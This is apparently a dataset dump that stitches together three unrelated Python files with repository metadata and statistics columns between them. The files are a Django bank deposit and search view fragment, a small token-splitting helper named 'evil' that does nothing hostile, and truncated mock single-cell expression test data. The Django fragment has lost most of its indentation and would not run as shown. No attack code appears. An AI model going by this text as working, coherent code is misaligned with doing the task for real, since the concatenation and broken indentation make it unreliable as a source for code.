result="no data found"
else:
Acno=ubibank[0].Acno
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
                result="Search success"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"deposite.html",{"data":data})
if cmd=="deposite":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
amount=int(request.GET["amount"])
ubibank[0].Acbal=str(int(ubibank[0].Acbal)+amount)
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
                result="deposit success"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"deposite.html",{"data":data})
| 31.834646 | 121 | 0.554044 | 450 | 4,043 | 4.977778 | 0.111111 | 0.121429 | 0.046429 | 0.053571 | 0.839732 | 0.835268 | 0.835268 | 0.835268 | 0.835268 | 0.835268 | 0 | 0.01183 | 0.289142 | 4,043 | 127 | 122 | 31.834646 | 0.767571 | 0.005689 | 0 | 0.8125 | 0 | 0 | 0.126151 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026786 | false | 0 | 0.026786 | 0 | 0.098214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e84db5cbe0abe9dab9039b9b8344222f10d0922f | 694 | py | Python | ksm-v2/compiler-src/cursed.py | jake-87/ksm | 0ca94ca3bc012a10ad2e1e32d0d791f66fbc8c60 | [
"BSD-3-Clause"
] | 1 | 2021-11-19T00:10:04.000Z | 2021-11-19T00:10:04.000Z | ksm-v2/compiler-src/cursed.py | jake-87/ksm | 0ca94ca3bc012a10ad2e1e32d0d791f66fbc8c60 | [
"BSD-3-Clause"
] | null | null | null | ksm-v2/compiler-src/cursed.py | jake-87/ksm | 0ca94ca3bc012a10ad2e1e32d0d791f66fbc8c60 | [
"BSD-3-Clause"
] | null | null | null | def evil(tok):
    # We don't talk about this file.
    # The first three tokens, each defaulting to "" when absent.
    a = tok[0] if len(tok) > 0 else ""
    b = tok[1] if len(tok) > 1 else ""
    c = tok[2] if len(tok) > 2 else ""
return (a, b, c) | 22.387097 | 36 | 0.31268 | 63 | 694 | 3.444444 | 0.31746 | 0.516129 | 0.129032 | 0.147465 | 0.764977 | 0.764977 | 0.764977 | 0.764977 | 0.764977 | 0.691244 | 0 | 0.024735 | 0.592219 | 694 | 31 | 37 | 22.387097 | 0.742049 | 0.043228 | 0 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e86105bc6c92be7bdb3a22e919889f07d3ac78d8 | 445,695 | py | Python | tests/mock_data/expression/matrix_mtx/AB_toy_data_toy_models.py | broadinstitute/scp-ingest-service | 1a63a27061b53a5f7909c72d59808f9af71456a6 | [
"BSD-3-Clause"
] | 1 | 2020-06-08T16:30:47.000Z | 2020-06-08T16:30:47.000Z | tests/mock_data/expression/matrix_mtx/AB_toy_data_toy_models.py | broadinstitute/scp-ingest-service | 1a63a27061b53a5f7909c72d59808f9af71456a6 | [
"BSD-3-Clause"
] | 146 | 2019-07-25T13:09:47.000Z | 2022-03-28T19:29:22.000Z | tests/mock_data/expression/matrix_mtx/AB_toy_data_toy_models.py | broadinstitute/scp-ingest-service | 1a63a27061b53a5f7909c72d59808f9af71456a6 | [
"BSD-3-Clause"
] | null | null | null | from bson.objectid import ObjectId
AB_toy_data_toy_data_models = {
"data_arrays": {
"AB_toy_data_toy.matrix.mtx Cells": {
"name": "AB_toy_data_toy.matrix.mtx Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Study",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TP53 Cells": {
"name": "TP53 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TP53 Expression": {
"name": "TP53 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.81,
2.58,
1.58,
2.0,
3.0,
2.81,
2.81,
3.0,
1.0,
1.58,
3.0,
3.0,
2.58,
1.58,
2.81,
2.81,
1.58,
1.0,
2.0,
2.0,
2.81,
2.32,
2.32,
1.0,
2.58,
3.0,
2.0,
1.58,
1.0,
2.0,
3.0,
1.58,
2.58,
2.58,
2.81,
2.32,
3.0,
1.58,
2.0,
2.81,
2.81,
2.0,
2.58,
2.32,
2.81,
2.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"EGFR Cells": {
"name": "EGFR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
